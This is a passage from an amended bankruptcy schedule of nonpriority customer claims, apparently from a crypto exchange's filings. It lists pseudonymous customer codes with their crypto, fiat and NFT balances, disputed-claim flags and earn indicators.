| 07381403 | | BAT[0], BF_POINT[200], BTC[0], DOGE[0], ETH[0], ETHW[0.00033898], GRT[0], LINK[0], MATIC[0], NFT [308045147848777398/Soi Lion #3796][1], NFT [350068275031754382/Cool Bean #3697][1], NFT [501678051086550394/Bahrain Ticket Stub #1892][1], NFT [506550917283407212/Entrance Voucher #2926][1], SHIB[0.00000001], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07381404 | | GRT[.80563163], USD[3.88] | | |
| 07381405 | | USD[10.00] | | |
| 07381407 | | BTC[.00503726], CUSDT[4], DOGE[1167.15850143], TRX[1], USD[0.00] | | |
| 07381408 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07381411 | | TRX[167.38766111], USD[0.00] | | |
| 07381412 | | DOGE[134.79913917], USD[0.00] | | |
| 07381413 | | NFT [366475044336803540/Entrance Voucher #29622][1] | | |
| 07381414 | | USD[0.02] | Yes | |
| 07381415 | | USD[10.00] | | |
| 07381416 | | USD[10.00] | | |
| 07381417 | | CUSDT[1], SHIB[1], USD[0.01] | | |
| 07381418 | | CUSDT[469.5596235], USD[0.00] | | |
| 07381419 | | BTC[0], DOGE[0], SOL[0] | | |
| 07381420 | | USD[10.00] | | |
| 07381421 | | USD[0.00] | | |
| 07381422 | | BRZ[1], CUSDT[4], DOGE[0], TRX[2], USD[7.76] | | |
| 07381423 | | BTC[.00483736], CUSDT[1], DOGE[3], ETH[0], USD[0.00] | | |
| 07381424 | | BTC[.00005266], DOGE[1], ETH[.00316134], ETHW[.00316134], USD[3.72] | | |
| 07381426 | | DOGE[138.44603463], USD[0.00] | | |
| 07381427 | | DOGE[1], TRX[0], USD[0.00], USDT[0] | | |
| 07381428 | | DOGE[2], SOL[2.01941847], USD[0.00] | | |
| 07381429 | Contingent, Disputed | ETH[0], ETHW[0.00006162], USD[0.06] | | |
| 07381430 | | BCH[.52791499], BRZ[1], CUSDT[1], DOGE[551.21505501], SHIB[3132446.10620339], SOL[.60309552], TRX[1], USD[0.00], USDT[1.0076547] | Yes | |
| 07381431 | | BTC[0], DOGE[60.47726537], USD[1.19] | | |
| 07381432 | Contingent, Disputed | BAT[.00000386], DOGE[1.19367359], SOL[.0000375], USD[230.40] | | |
| 07381433 | | USD[10.00] | | |
| 07381434 | | ETH[.08397109], ETHW[.08294321], USD[0.42] | Yes | |
| 07381435 | | USD[10.00] | | |
| 07381436 | | USD[10.00] | | |
| 07381437 | | USD[0.01], USDT[0] | | |
| 07381438 | | BTC[0], USD[0.00] | | |
| 07381440 | | BRZ[1], CUSDT[7], USD[0.00] | Yes | |
| 07381441 | | USD[10.00] | | |

Amended Schedule 1752 nonpriority customer claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381443 | | DOGE[6197.16830819], USD[0.00] | | |
| 07381444 | | USD[10.00] | | |
| 07381445 | | USD[10.00] | | |
| 07381446 | | USD[10.00] | | |
| 07381447 | | DOGE[1], USD[105.06] | | |
| 07381448 | | DOGE[1.69511984], TRX[0], USD[0.00] | | |
| 07381449 | | USD[10.00] | | |
| 07381452 | | NFT (497205727088791406/Entrance Voucher #3288)[1], TRX[78.3017601], USD[0.00] | | |
| 07381453 | | UNI[.00000015], USD[0.00] | | |
| 07381456 | | CUSDT[5], DOGE[2915.5672585], TRX[27711.46189782], USD[0.00] | | |
| 07381457 | | BCH[.18470271], BRZ[4], BTC[.00463659], CUSDT[11], GRT[29.57269181], TRX[6], USD[0.00] | | |
| 07381458 | | DOGE[2], USD[0.00] | | |
| 07381460 | | USD[10.00] | | |
| 07381461 | | USD[10.31] | Yes | |
| 07381463 | | USD[0.00] | | |
| 07381464 | | USD[0.01], USDT[0] | | |
| 07381465 | | USD[5.00] | | |
| 07381466 | | USD[10.00] | | |
| 07381467 | | BRZ[1], CUSDT[3], DOGE[1024.0448169], TRX[1], USD[0.01] | Yes | |
| 07381469 | | BAT[.65605272], CUSDT[1], DOGE[1.40857176], TRX[3], UNI[.0000067], USD[3.75] | | |
| 07381470 | | USD[10.00] | | |
| 07381471 | | DOGE[5045.58077959], USD[0.00] | | |
| 07381472 | | CUSDT[1], DOGE[172.30692163], USD[0.00] | | |
| 07381473 | | USD[10.00] | | |
| 07381474 | | USD[10.00] | | |
| 07381475 | | USD[10.00] | | |
| 07381477 | | DOGE[24.71181939], USD[0.00] | | |
| 07381478 | | CUSDT[1.80229211], TRX[1], USD[0.03] | | |
| 07381479 | | CUSDT[2], DOGE[28.53463978], ETHW[.58059347], TRX[3], USD[53.72] | Yes | |
| 07381480 | | CUSDT[2], USD[0.01], USDT[0] | | |
| 07381482 | | USD[10.00] | | |
| 07381483 | | DOGE[74.28652804], USD[0.00] | | |
| 07381484 | | BRZ[1], CUSDT[2], DOGE[0], USD[41.61] | | |
| 07381485 | | CUSDT[1], DOGE[455.94374996], USD[11.18] | | |
| 07381486 | | BTC[.05123753], DOGE[32660.36634650], USD[0.00] | Yes | |
| 07381487 | | USD[10.00] | | |
| 07381488 | | DOGE[270.36555421], USD[0.00] | | |
| 07381489 | | BRZ[1], CUSDT[1], DOGE[1], SOL[1.11491425], TRX[1], USD[0.00], USDT[4.97004988] | | |
| 07381490 | | CUSDT[1], USD[0.01] | | |
| 07381491 | | USD[0.00] | | |
| 07381492 | | CUSDT[2], DOGE[362.79015762], TRX[1], USD[0.00] | | |
| 07381493 | | DOGE[29494.39083837], SHIB[12782949.19244394], TRX[2], USD[0.00] | Yes | |
| 07381494 | | USD[10.00] | | |
| 07381499 | | USD[10.00] | | |
| 07381501 | | BTC[0.00000282], DOGE[0], ETH[0], ETHW[0.01182724], SHIB[2824122.03040034], SOL[1.28410047], USD[0.01] | Yes | |
| 07381502 | | BAT[1], CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07381503 | | USD[10.00] | | |
| 07381504 | | CUSDT[3], DOGE[121.68249673], USD[0.00] | | |
| 07381505 | | BRZ[1], BTC[.00212865], CUSDT[1], DAI[54.80506143], DOGE[9796.83692885], ETH[.09274396], ETHW[.09169562], GRT[63.98918323], LINK[.79893604], LTC[.54237189], SUSHI[2.75489337], TRX[1], UNI[1.81558918], USD[0.00] | Yes | |
| 07381506 | | USD[10.00] | | |
| 07381507 | | USD[10.00] | | |
| 07381508 | | USD[10.00] | | |
| 07381510 | | USD[10.00] | | |
| 07381511 | | BTC[.00063733], CUSDT[1], DOGE[688.46373151], ETH[.01702946], ETHW[.01702946], USD[0.00] | | |
| 07381512 | | CUSDT[5], TRX[2], USD[0.62], USDT[1] | | |
| 07381513 | Contingent, Disputed | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], USD[0.00] | | |
| 07381514 | | USD[10.00] | | |
| 07381515 | | BF_POINT[200], BRZ[1], DOGE[0], ETH[0], SOL[0.00000001], USD[0.00], USDT[0.04092133] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381516 | | USD[0.22] | | |
| 07381518 | | CUSDT[3], DOGE[21.6086397], TRX[1], USD[32.81] | | |
| 07381519 | | USD[0.00] | | |
| 07381520 | | DOGE[132.9855672], USD[0.00] | | |
| 07381521 | | USD[10.00] | | |
| 07381525 | | BTC[.00054022], USD[0.42] | | |
| 07381528 | | BTC[.00011343], DOGE[262.67068097], ETH[.00428287], ETHW[.00428287], TRX[1], USD[10.00] | | |
| 07381529 | | USD[0.01] | | |
| 07381530 | | USD[10.00] | | |
| 07381533 | | USD[0.47] | | |
| 07381534 | | BTC[.00021333], CUSDT[1], TRX[2], USD[0.01] | Yes | |
| 07381535 | | BCH[0.74800574], BRZ[0.00000161], BTC[0], CUSDT[3], LTC[.00000002], TRX[3], USD[0.00] | Yes | |
| 07381536 | | USD[10.00] | | |
| 07381538 | | USD[10.00] | | |
| 07381539 | | USD[10.00] | | |
| 07381540 | | BCH[.4231621], BTC[.00979067], DOGE[7839.63754802], TRX[4], USD[0.00] | | |
| 07381541 | | USD[2.78] | | |
| 07381542 | | USD[10.00] | | |
| 07381543 | | LINK[.15207815], TRX[93.64737418], USD[0.00] | | |
| 07381544 | | USD[0.00] | | |
| 07381545 | | DOGE[1.00138064], TRX[1], USD[0.03] | | |
| 07381546 | | USD[10.00] | | |
| 07381547 | | BF_POINT[300], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07381548 | | BRZ[2], USD[0.00], USDT[1] | | |
| 07381549 | | USD[10.00] | | |
| 07381550 | | BAT[0], DOGE[0.00038792], USD[0.00] | | |
| 07381552 | | DAI[.0823], USD[0.48] | | |
| 07381553 | | DOGE[0], TRX[1], USD[0.01] | | |
| 07381554 | | USD[10.00] | | |
| 07381555 | | USD[10.00] | | |
| 07381556 | | USD[10.00] | | |
| 07381559 | | BAT[1.0165555], BRZ[3], CUSDT[19], DOGE[5], TRX[8], USD[0.01] | Yes | |
| 07381560 | | USD[0.00] | | |
| 07381561 | | BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07381562 | | BRZ[1], BTC[.00117557], CUSDT[2], DOGE[872.48465881], TRX[791.86187748], UNI[2.46512919], USD[0.00] | | |
| 07381563 | | BRZ[1], DOGE[106.58414194], TRX[2.00004469], USD[0.01] | Yes | |
| 07381566 | | USD[10.00] | | |
| 07381568 | | USD[10.00] | | |
| 07381570 | | USD[10.00] | | |
| 07381571 | | BAT[0], BRZ[0], BTC[0], CUSDT[2], DOGE[2], ETH[0], GRT[0], TRX[2], USD[0.00] | | |
| 07381572 | | BAT[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07381573 | | DOGE[.00540506], USD[957.83], USDT[0] | | |
| 07381575 | | DOGE[194.64059699], USD[0.00] | | |
| 07381576 | | BTC[0], ETH[.00000001], ETHW[0], LTC[.0033264], SOL[0], TRX[.968], USD[0.00], USDT[0] | | |
| 07381577 | | DOGE[125.16277418], USD[0.00] | | |
| 07381578 | | ETH[.00587958], ETHW[.00587958], USD[0.00] | | |
| 07381579 | | BTC[.00082356], DOGE[12999.33848500], ETH[0.00546202], ETHW[0.00546202] | | |
| 07381580 | | BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0], YFI[0] | | |
| 07381581 | | USD[0.45] | | |
| 07381582 | | DOGE[3234.99543097], TRX[3], USD[0.01] | | |
| 07381585 | | BRZ[1], CUSDT[1], DOGE[7901.85849324], ETH[.26754758], ETHW[.26735238], TRX[1], USD[1344.13] | Yes | |
| 07381587 | | USD[550.00] | | |
| 07381589 | | BRZ[1], BTC[.04898016], CUSDT[2], DOGE[2], ETH[.47429999], ETHW[.47429999], SHIB[3744443.8441376], USD[0.00], USDT[1] | | |
| 07381591 | | DOGE[139.23738846], USD[0.00] | | |
| 07381594 | | USD[0.94] | | |
| 07381595 | | BTC[.00028047], DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07381596 | | DOGE[140.37270638], USD[0.00] | | |
| 07381597 | | CUSDT[2], SHIB[472075.91789589], TRX[254.58349822], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381598 | | USD[0.00] | | |
| 07381599 | | BRZ[2], CUSDT[2], DOGE[20.64174079], GRT[1.00313735], MATIC[56.85171196], TRX[1], USD[0.00] | Yes | |
| 07381601 | | CUSDT[2], USD[0.00] | | |
| 07381602 | | CUSDT[3], DOGE[0], TRX[2], USD[0.00] | | |
| 07381603 | | CUSDT[2], USD[0.00] | | |
| 07381605 | | BRZ[1], DOGE[1089.5926554], ETH[.01910606], ETHW[.01910606], USD[0.00] | | |
| 07381606 | | BTC[.00016295], USD[0.00] | | |
| 07381607 | | USD[10.00] | | |
| 07381608 | | DOGE[1045.37814217], USD[0.00] | | |
| 07381609 | | USD[10.00] | | |
| 07381610 | | USD[10.00] | | |
| 07381612 | | USD[10.00] | | |
| 07381613 | | BRZ[0], BTC[0.00000011], DOGE[0], ETH[0], ETHW[0], USD[0.00], YFI[0] | | |
| 07381614 | | USD[10.00] | | |
| 07381615 | | ETH[0], USD[1.92] | | |
| 07381616 | | USD[11.07] | Yes | |
| 07381618 | | CUSDT[1], DOGE[1495.87537729], TRX[1], USD[0.00] | | |
| 07381619 | | USD[10.00] | | |
| 07381620 | | BTC[0], DOGE[776.52183645], ETH[.10210655], ETHW[.10210655], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07381621 | | BRZ[1], CUSDT[1], USD[0.86] | | |
| 07381622 | | CUSDT[1], TRX[1.0000026], USD[0.01] | | |
| 07381623 | | CUSDT[3], DOGE[2693.40371251], TRX[2], USD[0.00] | Yes | |
| 07381626 | | USD[10.00] | | |
| 07381627 | | USD[10.00] | | |
| 07381628 | | USD[0.00] | | |
| 07381629 | | TRX[1], USD[35.25] | | |
| 07381631 | | CUSDT[2], DOGE[1.40288504], TRX[5], USD[1503.12] | | |
| 07381632 | | BRZ[2], BTC[.00246902], CUSDT[3], DOGE[5453.10397468], ETH[.07018019], ETHW[.07018019], TRX[5], USD[0.00], USDT[1] | | |
| 07381634 | | CUSDT[1], DOGE[2], NFT (491747656155447075/Entrance Voucher #29328)[1], USD[11.08] | Yes | |
| 07381635 | | USD[10.00] | | |
| 07381636 | | BAT[3.12756084], BRZ[12.56235885], CUSDT[62.72750382], TRX[2], USD[688.09], USDT[1] | | |
| 07381638 | | USD[10.00] | | |
| 07381639 | | BRZ[1], CUSDT[2], DOGE[700.40394669], SUSHI[2.12244515], TRX[160.75580951], USD[0.00] | | |
| 07381640 | | CUSDT[2], DOGE[0], ETH[0], GRT[0], SUSHI[0], TRX[2], USD[0.01], USDT[0] | | |
| 07381641 | | GRT[.7967], LINK[.00649781], UNI[.040785], USD[4.56], USDT[0.00826500] | | |
| 07381642 | | USD[10.00] | | |
| 07381643 | | USD[10.00] | | |
| 07381644 | | BRZ[1], CUSDT[4], DOGE[.22965164], USD[152.75] | | |
| 07381645 | | BTC[.00022259], USD[0.00] | | |
| 07381646 | | USD[10.00] | | |
| 07381647 | | USD[10.00] | | |
| 07381648 | | BRZ[2], CUSDT[7], DOGE[6], ETHW[.81176742], SHIB[3], TRX[5], USD[2152.44], USDT[1] | | |
| 07381649 | | CUSDT[2], DOGE[1.89266562], TRX[2], USD[0.00] | Yes | |
| 07381650 | | BTC[0.15857439], DOGE[3111.752], ETH[.99050418], ETHW[.99050418], LTC[9.74161452], SOL[.0097], USD[2.93] | | |
| 07381651 | | USD[10.00] | | |
| 07381652 | | USD[10.00] | | |
| 07381653 | | CUSDT[1], KSHIB[1295.6038727], TRX[1], USD[0.00] | | |
| 07381655 | | USD[10.00] | | |
| 07381656 | | DOGE[1], USD[10.00] | | |
| 07381657 | | USD[10.00] | | |
| 07381659 | | BRZ[1], BTC[.00340267], CUSDT[4], DOGE[479.8633908], TRX[1], USD[0.00] | Yes | |
| 07381660 | | USD[10.00] | | |
| 07381661 | | USD[0.00] | | |
| 07381662 | | USD[10.00] | | |
| 07381663 | | DOGE[0], ETH[0.00921558], ETHW[0.00921558], LTC[0], PAXG[0], TRX[1], USD[0.01] | | |
| 07381664 | | USD[0.00] | | |
| 07381665 | | CUSDT[4], DOGE[1], SHIB[1490368.97066092], USD[0.00] | Yes | |
| 07381667 | | CUSDT[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381668 | | BTC[.00003455], USD[0.00] | | |
| 07381669 | | BAT[66.11035834], BTC[.00448132], CUSDT[6], DOGE[3531.77255791], GRT[12.83379581], MATIC[20.28983005], SHIB[143257.61537297], TRX[1048.20153199], USD[0.13] | Yes | |
| 07381670 | | USD[0.00] | | |
| 07381671 | | CUSDT[1], SHIB[265623.46211991], USD[0.00] | Yes | |
| 07381672 | | USD[0.00] | | |
| 07381673 | | DOGE[135.61873408], USD[0.00] | Yes | |
| 07381674 | | BTC[.00020128], TRX[1], USD[0.00] | | |
| 07381675 | | USD[0.00] | | |
| 07381676 | | BTC[.00006208], USD[0.00] | | |
| 07381677 | | BRZ[1], CUSDT[2], DOGE[219.07441964], TRX[1], USD[0.90] | Yes | |
| 07381679 | | USD[0.01] | | |
| 07381680 | | BTC[.165084], DOGE[2325.27], ETH[.085914], ETHW[.085914], GRT[.975], LINK[2.2495], LTC[1.20807], SOL[7.6923], SUSHI[5.4945], TRX[798.201], USD[1.00] | | |
| 07381681 | | USD[0.00] | | |
| 07381682 | | USD[0.00] | | |
| 07381683 | | CUSDT[1], DOGE[225.2275988], SHIB[394597.27186192], TRX[2], USD[0.00] | Yes | |
| 07381684 | | DOGE[151.61444901], USD[0.00] | Yes | |
| 07381685 | | BRZ[1], USD[0.00] | Yes | |
| 07381686 | | USD[0.00] | | |
| 07381687 | Contingent, Disputed | BTC[0], ETH[0], USD[0.00] | | |
| 07381688 | | USD[0.00] | | |
| 07381689 | | ALGO[1], BAT[10.20582557], BRZ[4], CUSDT[2], DOGE[1], ETH[0.00010128], GRT[13.04501566], LINK[2.02455767], LTC[0], MATIC[1.00124453], SHIB[20], SOL[0.00133845], SUSHI[.02335942], TRX[36.76935656], UNI[1.0184984], USD[4613.22], USDT[16.53320129] | Yes | |
| 07381691 | | BTC[.0020916], USD[2.99] | | |
| 07381692 | | CUSDT[60.85759234], DOGE[69.18579018], TRX[179.14614806], USD[0.00] | Yes | |
| 07381693 | | DOGE[28.13928314], USD[0.00] | | |
| 07381694 | | USD[0.01] | | |
| 07381695 | | USD[0.00] | | |
| 07381696 | | BRZ[1], CUSDT[2], DOGE[923.88301507], USD[0.03] | Yes | |
| 07381697 | | BRZ[1], DOGE[5241.2981596], USD[0.00], USDT[1] | | |
| 07381699 | | BTC[0], ETH[0], LTC[0], SOL[0.01497818], USD[0.00], USDT[0] | Yes | |
| 07381700 | | DOGE[138.95958457], USD[0.00] | | |
| 07381701 | | DOGE[128.33189708], USD[0.00] | | |
| 07381703 | | AAVE[.10931968], ALGO[24.78774777], AVAX[.53102135], BAT[30.57834161], BCH[.18050351], BRZ[54.90903757], BTC[.0711522], DOGE[3976.0470555], ETH[.0071765], ETHW[1.58415065], GRT[108.50137744], KSHIB[821.63160386], LINK[1.19825534], LTC[.16071221], MATIC[8.67994799], MKR[.01140117], NEAR[3.81273301], NFT [376219101968555921/Entrance Voucher #1641][1], NFT [420410098334091163/Humpty Dumpty #852][1], PAXG[.1238396], SHIB[2139391.51164507], SOL[.29973223], SUSHI[5.40268097], TRX[152.98443297], UNI[1.35258596], USD[169.66], YFI[.00122525] | Yes | |
| 07381704 | | USD[0.00] | | |
| 07381705 | | BTC[.00018883], USD[0.00] | | |
| 07381706 | | USD[0.00] | | |
| 07381707 | | BTC[.00016004], DOGE[.00635766], USD[0.00] | | |
| 07381708 | | AAVE[0], ALGO[0.50413795], CUSDT[8], ETH[.0041418], ETHW[.00408708], GRT[.3990619], MATIC[0.00277727], SHIB[4], SOL[0], SUSHI[0], TRX[2], USD[0.05] | Yes | |
| 07381709 | | SHIB[1], USD[29.61] | | |
| 07381710 | | USD[0.00] | | |
| 07381712 | | ETH[.00561343], ETHW[.00561343], USD[0.00] | | |
| 07381713 | | USD[0.00] | | |
| 07381714 | | DOGE[8231.82694511], SHIB[15566625.15566625], TRX[2], USD[0.00], USDT[1] | | |
| 07381716 | | USD[0.00] | | |
| 07381717 | | USD[0.00] | | |
| 07381718 | | BRZ[1], CUSDT[1], USD[0.00], USDT[.10634439] | Yes | |
| 07381719 | | USD[0.00] | | |
| 07381720 | | BRZ[3], CUSDT[5], DOGE[577.43813442], TRX[3], USD[0.01], USDT[1] | | |
| 07381722 | | TRX[1], USD[0.00] | Yes | |
| 07381723 | | DOGE[130.46597057], SHIB[41153.1725394], USD[0.00] | | |
| 07381726 | | USD[0.00] | | |
| 07381728 | | TRX[74.86119798], USD[0.00] | | |
| 07381729 | | USD[0.00] | | |
| 07381730 | | BRZ[3], CUSDT[36], DOGE[351.95849651], TRX[19.96162456], USD[0.00] | Yes | |
| 07381731 | | ETH[0.00043359], ETHW[0.00043359], GRT[.316], SOL[0], USD[0.00], USDT[0] | | |
| 07381732 | | BTC[0], DOGE[0.91781395], USD[0.00] | | |
| 07381733 | | BCH[.01781562], CUSDT[2], DOGE[364.63348046], ETH[.01902597], ETHW[.01879341], SHIB[567521.46840793], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381735 | | BTC[0], ETH[0], USD[0.00] | | |
| 07381736 | | BAT[2.11872681], BRZ[2], CUSDT[2], DOGE[50598.71098803], GRT[1.00456563], LINK[1.10314018], TRX[7.41653445], USD[0.00], USDT[1.10314018] | Yes | |
| 07381737 | | GRT[9.91443259], USD[36.00] | | |
| 07381740 | | DOGE[6.58165669], USD[0.00] | | |
| 07381741 | | DOGE[1], TRX[162.35901149], USD[0.00] | | |
| 07381744 | | BRZ[2], CUSDT[1], DOGE[1929.51070931], TRX[2], USD[8.96] | | |
| 07381745 | | CUSDT[12], DOGE[.0126902], TRX[1], USD[0.00] | Yes | |
| 07381747 | | BTC[0], DOGE[.998], ETH[0], ETHW[0.09890100], SOL[0.09990000], USD[0.14], USDT[0] | | |
| 07381748 | | USD[10.00] | | |
| 07381749 | | CUSDT[5], ETH[0], USD[0.00] | | |
| 07381750 | | USD[10.00] | | |
| 07381751 | | USD[10.00] | | |
| 07381752 | | BAT[0.00000914], BRZ[8.52107919], CUSDT[6], DAI[0], DOGE[2], ETH[0], SHIB[22216.93782743], SOL[0], SUSHI[0], TRX[4], USD[0.01], YFI[0] | Yes | |
| 07381753 | | BTC[.00020029], DOGE[32.95255556], USD[0.00] | | |
| 07381756 | | USD[0.16] | Yes | |
| 07381757 | | DOGE[913.332], USD[20.56] | | |
| 07381758 | | CUSDT[4], DOGE[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07381759 | | BAT[1], CUSDT[8], DOGE[62636.59681748], GRT[2], KSHIB[39827.37059825], LINK[1], SOL[1], TRX[14.46608984], USD[0.99], USDT[3] | | |
| 07381760 | | CUSDT[1], DOGE[318.89498113], USD[0.01] | | |
| 07381762 | | USD[10.00] | | |
| 07381763 | | USD[10.00] | | |
| 07381764 | | USD[10.00] | | |
| 07381765 | | CUSDT[4], DOGE[0], GRT[0], TRX[1], USD[0.00] | Yes | |
| 07381766 | | BRZ[1], ETH[.00545718], CUSDT[2], DOGE[43261.98826648], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07381767 | | BTC[.00929647], SHIB[6], SOL[.00000262], TRX[46.58558564], USD[0.01] | Yes | |
| 07381769 | | USD[0.01] | | |
| 07381770 | | USD[0.00] | | |
| 07381771 | | USD[10.00] | | |
| 07381772 | | USD[10.00] | | |
| 07381773 | | USD[10.00] | | |
| 07381774 | | ETH[.00014547], ETHW[.00014547], USD[0.00], USDT[0] | | |
| 07381775 | | BCH[0], BTC[0], CUSDT[27], DOGE[164.29963598], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07381776 | | DOGE[616.93562959], TRX[241.70545434], USD[10.00] | | |
| 07381777 | | BTC[.00021095], USD[0.00] | | |
| 07381778 | | USD[0.00] | | |
| 07381779 | | DOGE[145.81470246], USD[0.00] | | |
| 07381780 | | USD[0.00] | | |
| 07381781 | | BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07381783 | | USD[10.00] | | |
| 07381785 | | SHIB[57024.23659699], USD[0.00], USDT[0] | Yes | |
| 07381786 | | USD[10.00] | | |
| 07381788 | | USD[10.00] | | |
| 07381789 | | AVAX[0], BF_POINT[200], DOGE[0.01197245], ETH[0], GRT[0], MATIC[0], NEAR[0], SHIB[6.63934505], SOL[0.00000001], USD[0.00] | Yes | |
| 07381791 | | USD[10.00] | | |
| 07381793 | | USD[10.00] | | |
| 07381794 | | CUSDT[3], DOGE[1], USD[0.00] | | |
| 07381796 | | CUSDT[1], TRX[1], USD[95.62] | | |
| 07381797 | | DOGE[2], USD[0.01] | | |
| 07381798 | | ETHW[.530095], SUSHI[.3365], TRX[.696], USD[0.01] | | |
| 07381800 | | DOGE[1], SUSHI[.73845751], USD[0.00] | Yes | |
| 07381801 | | USD[10.00] | | |
| 07381802 | | CUSDT[1], DOGE[5.14029314], ETH[.00007303], ETHW[.00007303], USD[0.43] | | |
| 07381803 | | USD[10.89] | Yes | |
| 07381805 | | TRX[1], USD[0.00] | Yes | |
| 07381806 | | DOGE[130.72020164], USD[0.00] | | |
| 07381807 | | USD[10.00] | | |
| 07381808 | | TRX[.000002] | | |
| 07381809 | | BRZ[1], DOGE[1], ETH[0], USD[60.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07381810 | | USD[10.00] | | |
| 07381811 | | USD[10.00] | | |
| 07381812 | | BRZ[1], CUSDT[5], GRT[1], TRX[6], USD[0.00] | | |
| 07381813 | | USD[2.16] | | |
| 07381814 | | BTC[.00179327], USD[10.00] | | |
| 07381815 | | USD[10.00] | | |
| 07381816 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07381817 | | DOGE[0.15051824], USD[0.00] | | |
| 07381819 | | DOGE[22439.91782446], KSHIB[5380.859162], LTC[5.12950598], MATIC[14.33411738], NFT (306301757996702378/1ST.EDDY-KLAUS_XRP THE PREDICTOR (Rare))[1], NFT (347404829170915950/Sword of the King Persia)[1], NFT (386819324432574141/Abstract Artillery #16)[1], NFT (458175632564177622/Sword of the Zeus)[1], NFT (573815583891966635/Pop Art #39)[1], SHIB[178.76963776], SOL[40.84791213], TRX[88.97980029], USD[0.41] | Yes | |
| 07381820 | Contingent, Disputed | BAT[1], BRZ[1], BTC[.0000504], CUSDT[5], DOGE[1.00000276], GRT[1], TRX[2], USD[1693.35] | Yes | |
| 07381821 | | USD[10.00] | | |
| 07381822 | | CUSDT[7], DOGE[ 23561414], MATIC[0], TRX[1], USD[0.50], USDT[1.08601066] | Yes | |
| 07381823 | | TRX[1], USD[0.00], USDT[0] | Yes | |
| 07381824 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07381825 | | USD[10.00] | | |
| 07381826 | | BRZ[1], CUSDT[3], DOGE[.00000851], TRX[1], USD[0.00] | | |
| 07381827 | | CUSDT[1], DOGE[1.91422797], ETH[.00503387], ETHW[.00503387], USD[0.00] | | |
| 07381829 | | BCH[0], BTC[0], DOGE[0.06320216], ETH[0], ETHW[0], PAXG[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07381830 | | USD[10.00] | | |
| 07381832 | | CUSDT[4.58], USD[30.33] | | |
| 07381833 | | USD[10.00] | | |
| 07381835 | | USD[0.00], USDT[.00040289] | | |
| 07381836 | | CUSDT[3], USD[0.00], USDT[0] | | |
| 07381837 | | USD[10.00] | | |
| 07381838 | | USD[10.00] | | |
| 07381839 | | DOGE[74.33767687], ETH[.00279818], ETHW[.00279818], USD[0.00] | | |
| 07381840 | | USD[10.00] | | |
| 07381841 | | SOL[.04981947], USD[0.00] | | |
| 07381843 | | CUSDT[2], ETH[.00000013], ETHW[.00000013], USD[-0.04] | | |
| 07381845 | | USD[10.00] | | |
| 07381846 | Contingent, Disputed | USD[10.00] | | |
| 07381847 | | SHIB[1099089.74439204], USD[0.00] | | |
| 07381848 | | USD[10.00] | | |
| 07381849 | | USD[10.00] | | |
| 07381851 | | DOGE[.466], USD[0.00] | | |
| 07381852 | | USD[10.00] | | |
| 07381853 | | BCH[.02146528], BTC[.00024053], DOGE[1], ETH[.00377282], ETHW[.00373178], LTC[.07345716], MATIC[9.66383283], SHIB[36474.14537444], UNI[.56214709], USD[0.00] | Yes | |
| 07381856 | | USD[10.00] | | |
| 07381858 | | USD[10.00] | | |
| 07381859 | | CUSDT[6], TRX[1], USD[0.07] | | |
| 07381860 | | BRZ[1], CUSDT[3.89338955], TRX[4], USD[0.02] | | |
| 07381861 | | USD[10.99] | Yes | |
| 07381862 | | DOGE[.84436794], TRX[1], USD[0.01] | | |
| 07381864 | | USD[0.00] | | |
| 07381865 | | USD[10.00] | | |
| 07381866 | | USD[10.00] | | |
| 07381867 | | USD[27.70] | | |
| 07381868 | | DOGE[1], LTC[.05132031], USD[0.00] | | |
| 07381869 | | CUSDT[2], TRX[504.99030135], USD[0.00] | | |
| 07381870 | | BRZ[0], DOGE[23255.16316357], NFT (553714077595983000/Warriors Gold Blooded NFT #1247)[1], TRX[1], USD[0.00] | | |
| 07381872 | | BCH[.05052694], BRZ[1], CUSDT[3], DOGE[1296.75892048], USD[0.00] | Yes | |
| 07381873 | | SHIB[1], USD[0.01] | | |
| 07381874 | | DOGE[25.42203566], USD[0.00] | | |
| 07381875 | | USD[10.00] | | |
| 07381876 | | DOGE[0], USD[0.00] | | |
| 07381877 | | USD[9.71] | | |
| 07381878 | | TRX[229.82834742], USD[0.00] | | |

